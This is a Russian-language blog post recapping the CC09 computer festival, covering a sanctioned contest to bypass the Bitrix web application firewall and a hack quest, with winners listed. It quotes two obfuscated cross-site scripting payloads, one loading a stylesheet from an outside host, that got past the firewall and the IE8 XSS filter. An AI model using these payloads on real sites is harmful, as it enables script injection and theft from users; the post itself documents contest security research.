Компьютерный фестиваль CC09 завершен. И после нескольких бессонных ночей начинаем просыпаться, приходить в себя, а потому самое время, чтобы подвести итоги и поделиться впечатлениями.
Мероприятие прошло на позитивной волне ( фотки), многие работы (демо && realtime coding) произвели на меня сильное впечатление и оставили приятный шлейф, что присутствую в этом коллективе. Вообще, безусловно, не часто встретишь столько талантливых людей в одном месте. Атмосфера на фестивале была замечательная! Но и имели место быть разного рода косяки с падением каналов и пр. в том числе в хак-зоне... Но они, конечно же, не могли испортить хорошего настроения, в котором все прибывали :)
name='more'>
В этом году CC09 был гораздо масштабнее, чем в предыдущие годы. Например, можно было наблюдать за всем происходящим в режиме реального времени удаленно (трансляция фестиваля велась через youtube). Также, в этом году свой вклад внесла команда Positive Technologies по тематике hack questи realtime bitrix waf hack (совместно с разработчиками CMS Bitrix). Так как тема по этим конкурсам мне близка, то о них дальше и пойдет речь.
Realtime Bitrix WAF Hack
Обойти Bitrix WAF пытались многие (более 25.000 попыток проведения атаки) и до последних минут завершения конкурса, но обойти фильтры от уязвимостей SQL Injection, Path Traversal/LFI так никто и не сумел. Однако пробить по трем векторам атаки Cross-Site Scripting двум участникам конкурса все-таки удалось. И таблица победителей выглядит следующим образом:
Первое место - Владимир Воронцов (ака d0znp) сумел проэксплуатировать уязвимость типа "Межсайтовое выполнение сценариев" отраженного типа, в том числе, эксплуатация уязвимости была продемонстрирована в обход фильтра IE 8 xss filter. Действительно заслуженное первое место. А вот и сами запросы для атаки:
<style>@\69\6d\70\6f\72\74 'http://onsec.ru/xss.css';</style>
<div style="'\62\65\68\61\76\69\6F\72:">1</div>
Второе место занял человек, скрывающийся под псевдонимом " insa". Он откопал отраженный XSS, причем ошибка содержалась только на игровом сервере (опечатка при подготовке сервера). Но условия конкурса были выполнены, поэтому "insa" получил заслуженное второе место.
Третье место решили отдать " ParanoidChaos", который больше копал не waf, а саму CMSку Битрикс. И его раскопки позволили выявить пару незначительных багов "Раскрытие корневого каталога Web-сервера" в конфигурации отличной от дефолтовой (не на игровом сервере). За проявленный энтузиазм "ParanoidChaos" занял третье место и в момент вручения подарка (коммерческой версии Битрикс) сказал, что продолжит исследования по анализу защищенности этой CMS. Хочется надеяться, что исследования будут носить мирный характер, а не провокационный, как то hack video по эксплуатации XSS в Битриксе, которое демонстрировалось на главном экране фестиваля...(кстати уже fixed).
Hack Quest
В этом году, как я и обещал, был подготовлен интересный хак-квест, который со слов игроков всем понравился. Безусловно, приятно, что работа, которая выполнялась "с душой", была высоко оценена. Из всех подготовленных этапов хак-квеста, только один не смог пройти никто. Это этап по реверсингу программки crackme (главный разработчик систем ИБ в Positive Technologies сумел ее отреверсить за четыре часа). Таблица почета по конкурсу Hack Quest 09:
Первое место присвоено "r0b". Он сумел пройти все этапы конкурса, за исключением этапа с crackme. К сожалению, мы с ним попрощались в районе часа второго дня и на церемонию награждения он не вернулся. Поэтому награждали вторых по количеству заработанных очков это команда Antichat с результатом в минус один прошедших конкурсов и не раскопавших второго бонусного ключа. Подробности опубликованы на форуме CC.
ЗЫ: в ближайшее будущее опубликую, как нужно было проходить конкурс (и как проходили некоторые его этапы... вернее обходили:))
В целом мероприятие оставило хорошее впечатление, надеюсь, что большинство его со мной разделяют. До новых встреч на подобных мероприятиях!
Обращаем внимание, что все материалы в этом блоге представляют личное мнение их авторов. Редакция SecurityLab.ru не несет ответственности за точность, полноту и достоверность опубликованных данных. Вся информация предоставлена «как есть» и может не соответствовать официальной позиции компании.
Ваш мозг имеет потолок. Выберите, где он.
Хватит верить себе. Этот пост — о том, почему только математика способна показать вам реальное интеллектуальное бессилие.